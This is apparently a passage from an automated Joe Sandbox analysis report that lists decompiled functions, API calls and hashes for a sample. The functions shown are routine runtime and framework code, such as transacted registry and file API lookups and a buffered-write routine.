      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
      • String ID: HtmlHelpA$hhctrl.ocx
      • API String ID: 3274081130-63838506
      • Opcode ID: b0f436a2b2c6ee6390c93cc650be83e42c48fcca7fb0e055a5255a0400e65452
      • Instruction ID: d42a18e05590ca883acd5dbef18611775e39433b7e843cb113c4f60043f41d52
      • Opcode Fuzzy Hash: b0f436a2b2c6ee6390c93cc650be83e42c48fcca7fb0e055a5255a0400e65452
      • Instruction Fuzzy Hash: 3201F931540706BBDF216FA5CD06F5B3B98EF85761F00C829F45B96591CF74D810A7A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BBA6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E009BBA6E(struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				int _t16;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				struct HWND__* _t24;
				signed int _t25;

				_t7 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t7 ^ _t25;
				_t24 = _a4;
				if(_t24 != 0) {
					if((GetWindowLongA(_t24, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t24,  &_v20, 0xa);
						_t16 = CompareStringA(0x409, 1,  &_v20, 0xffffffff, "combobox", 0xffffffff);
						asm("sbb eax, eax");
						_t11 =  ~(_t16 - 2) + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E00AAB46A(_t11, _t19, _v8 ^ _t25, _t22, _t23, _t24);
			}













      0x009bba76
      0x009bba7d
      0x009bba81
      0x009bba86
      0x009bba9b
      0x00000000
      0x009bba9d
      0x009bbaa4
      0x009bbabe
      0x009bbac9
      0x009bbacb
      0x009bbacb
      0x009bba88
      0x009bba88
      0x009bba88
      0x009bba88
      0x009bbad8

      APIs
      • GetWindowLongA.USER32 ref: 009BBA8F
      • GetClassNameA.USER32(?,?,0000000A), ref: 009BBAA4
      • CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 009BBABE
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClassCompareLongNameStringWindow
      • String ID: combobox
      • API String ID: 1414938635-2240613097
      • Opcode ID: e1b4af80d3843d9474e688c35e6c7b116fc5e388f6decba31b540fc7ca56febf
      • Instruction ID: 835dae80c4abd8bd70850a98b02f6ca1e23c75a6bf7ac1f4e0a16a1de24a8eb8
      • Opcode Fuzzy Hash: e1b4af80d3843d9474e688c35e6c7b116fc5e388f6decba31b540fc7ca56febf
      • Instruction Fuzzy Hash: BEF0F432A512287BCB00EB68CC05EBE73A8EB05730B500705F432E71C1DB709A018695
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B32BB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B32CD
      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 009B32DD
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegCreateKeyTransactedA
      • API String ID: 1646373207-1184998024
      • Opcode ID: 4419f869cc25c8f822de731951072a16ddb26115abf1c6dfc1adaa60b1ff2de7
      • Instruction ID: e64e1ab9d56489fc611f702a2da16c5404c89d93da626d5dc29161398fcd9dcb
      • Opcode Fuzzy Hash: 4419f869cc25c8f822de731951072a16ddb26115abf1c6dfc1adaa60b1ff2de7
      • Instruction Fuzzy Hash: 96F03C32140209FBCF119FD4DD04BDA7BA9FB08761F448426FA0695060CB76D561EBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B39AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 18%
      			E009B39AA(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegDeleteKeyA();
				}
				_t7 = GetModuleHandleA("Advapi32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
				if(_t8 == 0) {
					goto L6;
				}
				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
			}






      0x009b39b1
      0x009b39b7
      0x009b39ea
      0x009b39f5
      0x00000000
      0x009b39f7
      0x009b39ef
      0x009b39ef
      0x009b39be
      0x009b39c6
      0x00000000
      0x00000000
      0x009b39ce
      0x009b39d6
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B39BE
      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 009B39CE
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegDeleteKeyTransactedA
      • API String ID: 1646373207-1972538232
      • Opcode ID: 5e10baecc21a64072e7c39da2a951ec4b1787c89bc9814e0a7019c1bbdbf7eca
      • Instruction ID: d205a6004d8bd5baa9c4816a359457ab9ce9bffe6ea4b0980e1fecdf3bd0af74
      • Opcode Fuzzy Hash: 5e10baecc21a64072e7c39da2a951ec4b1787c89bc9814e0a7019c1bbdbf7eca
      • Instruction Fuzzy Hash: 97F0A733240500FB87319B9AAD09CE7BB6DEBC1B71324CA37F056C1010D6B29942D660
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B3262 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B3274
      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 009B3284
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegOpenKeyTransactedA
      • API String ID: 1646373207-496252237
      • Opcode ID: fc1783e652375edcb25c2a3eeb9be17d0bac35f6f64a417befde96cfeb3e56d9
      • Instruction ID: c97ee5db1b260d6ab81304a8e964db268d112711ca9f0eac0c6c1b7ae0319263
      • Opcode Fuzzy Hash: fc1783e652375edcb25c2a3eeb9be17d0bac35f6f64a417befde96cfeb3e56d9
      • Instruction Fuzzy Hash: BFF0B432140204BBCB118FE4EE04BD63B98EB04761F048426FA2380060D771C561DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C8488 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 18%
      			E009C8488(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				intOrPtr* _t10;

				_t10 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 0;
					}
					return MoveFileA();
				}
				_t6 = GetModuleHandleA("kernel32.dll");
				if(_t6 == 0) {
					goto L6;
				}
				_t7 = GetProcAddress(_t6, "MoveFileTransactedA");
				if(_t7 == 0) {
					goto L6;
				}
				return  *_t7(_a4, _a8, 0, 0, 2,  *_t10);
			}






      0x009c848e
      0x009c8493
      0x009c84ca
      0x009c84d4
      0x00000000
      0x009c84d4
      0x009c84ce
      0x009c84ce
      0x009c849a
      0x009c84a2
      0x00000000
      0x00000000
      0x009c84aa
      0x009c84b2
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,009C872A,?,?,?,009B73AB,?,00000010,00000000,00000010,00000000), ref: 009C849A
      • GetProcAddress.KERNEL32(00000000,MoveFileTransactedA), ref: 009C84AA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: MoveFileTransactedA$kernel32.dll
      • API String ID: 1646373207-3123790474
      • Opcode ID: 93944e7adeb248e91cd365c1b87b07d3f2a0ccd00d0ac2337398e6c595e1f99e
      • Instruction ID: f8067b87049fe33f68ae2f0da2f9491dc83eb90e99830de6cad65b499af883f0
      • Opcode Fuzzy Hash: 93944e7adeb248e91cd365c1b87b07d3f2a0ccd00d0ac2337398e6c595e1f99e
      • Instruction Fuzzy Hash: C5F0A031A40206FAE7245FA5DC09F93779CAB04B51F05C42FB542A54F0DBB5C840CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009D2C51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,00001000,?,009D2E8C,?,00000000,?,00001022,?,00000000,?,?), ref: 009D2C63
      • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 009D2C73
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: GetFileAttributesTransactedA$kernel32.dll
      • API String ID: 1646373207-3426858862
      • Opcode ID: 0350fd152550a3e727b52f2b851325a697b2255e1cf52dba38ed3e30c0dc1378
      • Instruction ID: 1fdde9edbf006c687004460ace3b1c128abe3a2ad9a7d26a1f9744c4e029d0b4
      • Opcode Fuzzy Hash: 0350fd152550a3e727b52f2b851325a697b2255e1cf52dba38ed3e30c0dc1378
      • Instruction Fuzzy Hash: 7AF08C31194205EBCB205FB49D08B9ABB98FB24762F04C8ABA88681260C7758891DA60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C843E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E009C843E(intOrPtr* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 0;
					}
					return DeleteFileA();
				}
				_t5 = GetModuleHandleA("kernel32.dll");
				if(_t5 == 0) {
					goto L6;
				}
				_t6 = GetProcAddress(_t5, "DeleteFileTransactedA");
				if(_t6 == 0) {
					goto L6;
				}
				return  *_t6(_a4,  *_t9);
			}






      0x009c8444
      0x009c8449
      0x009c8477
      0x009c8481
      0x00000000
      0x009c8481
      0x009c847b
      0x009c847b
      0x009c8450
      0x009c8458
      0x00000000
      0x00000000
      0x009c8460
      0x009c8468
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,009C875D,?,?,009B7354,?,00000000), ref: 009C8450
      • GetProcAddress.KERNEL32(00000000,DeleteFileTransactedA), ref: 009C8460
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: DeleteFileTransactedA$kernel32.dll
      • API String ID: 1646373207-1808990283
      • Opcode ID: 31b1e6190288988b9b4f1cd96c161d07756a7dfd822ba9f22534114c6323692e
      • Instruction ID: 2265b9371e15744ccb7e08dccabc9ddeba8631bede5c6b8ee6cc2dbf228d49fe
      • Opcode Fuzzy Hash: 31b1e6190288988b9b4f1cd96c161d07756a7dfd822ba9f22534114c6323692e
      • Instruction Fuzzy Hash: 58E06531940215EBC7245BE59C08F53779DEB40791F08883BE442C1160DF758883C661
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AAC4C3 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
      Download Yara Rule
      C-Code - Quality: 96%
      			E00AAC4C3(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E00AB4B9D(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E00AB2CD9(_t96));
										_t71 = E00AB57C1(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E00AAC172(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E00AAB080( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00AADB06(_t100))) = 0x16;
					E00AB4B8D();
					goto L4;
				}
			}





























      0x00aac4ce
      0x00aac4d3
      0x00aac4f2
      0x00000000
      0x00aac4db
      0x00aac4db
      0x00aac4de
      0x00aac4e0
      0x00aac4f9
      0x00aac4fc
      0x00aac4fe
      0x00000000
      0x00000000
      0x00aac500
      0x00aac505
      0x00aac507
      0x00aac50a
      0x00000000
      0x00000000
      0x00aac50c
      0x00aac510
      0x00aac517
      0x00aac51a
      0x00aac51d
      0x00aac51f
      0x00aac529
      0x00aac521
      0x00aac524
      0x00aac524
      0x00aac530
      0x00aac532
      0x00aac5f7
      0x00000000
      0x00aac538
      0x00aac538
      0x00aac53b
      0x00aac53b
      0x00aac541
      0x00aac572
      0x00aac572
      0x00aac575
      0x00aac5ce
      0x00aac5d5
      0x00aac5d8
      0x00aac603
      0x00aac603
      0x00aac605
      0x00000000
      0x00aac609
      0x00aac5da
      0x00aac5dd
      0x00aac5e0
      0x00aac5e1
      0x00aac5e4
      0x00aac5e6
      0x00aac5e8
      0x00aac5e8
      0x00000000
      0x00aac5e6
      0x00aac577
      0x00aac579
      0x00aac586
      0x00aac586
      0x00aac58a
      0x00aac58c
      0x00aac590
      0x00aac592
      0x00aac595
      0x00aac595
      0x00aac595
      0x00aac597
      0x00aac598
      0x00aac5a2
      0x00aac5a3
      0x00aac5a8
      0x00aac5ab
      0x00aac5ae
      0x00aac611
      0x00aac611
      0x00aac615
      0x00000000
      0x00aac5b0
      0x00aac5b0
      0x00aac5b2
      0x00aac5b4
      0x00aac5b6
      0x00aac5b6
      0x00aac5b8
      0x00aac5bb
      0x00aac5bd
      0x00aac5bf
      0x00000000
      0x00aac5c1
      0x00aac5c1
      0x00aac5c1
      0x00000000
      0x00aac5c1
      0x00aac5bf
      0x00aac5ae
      0x00aac57c
      0x00aac582
      0x00aac584
      0x00000000
      0x00000000
      0x00000000
      0x00aac584
      0x00aac543
      0x00aac546
      0x00aac548
      0x00000000
      0x00000000
      0x00aac54a
      0x00aac5ff
      0x00aac5ff
      0x00aac5ff
      0x00000000
      0x00aac5ff
      0x00aac550
      0x00aac552
      0x00aac554
      0x00aac556
      0x00aac556
      0x00aac55e
      0x00aac563
      0x00aac566
      0x00aac568
      0x00aac56b
      0x00aac56d
      0x00000000
      0x00aac5ef
      0x00aac5ef
      0x00aac5ef
      0x00000000
      0x00aac538
      0x00aac532
      0x00aac4e2
      0x00aac4e7
      0x00aac4ed
      0x00000000
      0x00aac4ed

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
      • String ID:
      • API String ID: 2782032738-0
      • Opcode ID: ed205facf0757f7a0708fa11dc88b4ffc7fe014ae8c8f429d2f0d019333c6636
      • Instruction ID: 70aa6a80465b407952775a678e9adf8f420ea4fbd7962be0dfb4ac66619185f9
      • Opcode Fuzzy Hash: ed205facf0757f7a0708fa11dc88b4ffc7fe014ae8c8f429d2f0d019333c6636
      • Instruction Fuzzy Hash: 1641B631E00705DBEB28DFA9C9546AEBBB5AF82370F248529E455975C1E770EE41CB40
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A8C8F Relevance: 6.1, APIs: 4, Instructions: 106COMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009A8C8F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				struct HWND__* _t37;
				signed int _t38;
				void* _t66;
				short* _t68;
				struct HWND__** _t70;
				void* _t71;
				struct HWND__** _t75;
				intOrPtr _t77;

				_t66 = __edx;
				_push(0x10c);
				E00AAD29B(0xac7d2f, __ebx, __edi, __esi);
				_t70 =  *(_t71 + 0xc);
				_t34 =  *((intOrPtr*)(_t71 + 0x10));
				_t75 = _t70;
				_t57 = 0 | _t75 != 0x00000000;
				 *((intOrPtr*)(_t71 - 0x118)) = _t34;
				if(_t75 != 0) {
					L2:
					_t77 = _t34;
					_t57 = 0 | _t77 != 0x00000000;
					if(_t77 != 0) {
						goto L1;
					}
					E009A5D70(_t71 - 0x114, _t66, E009B9D52());
					_t60 = _t70[2];
					_t37 = _t70[1];
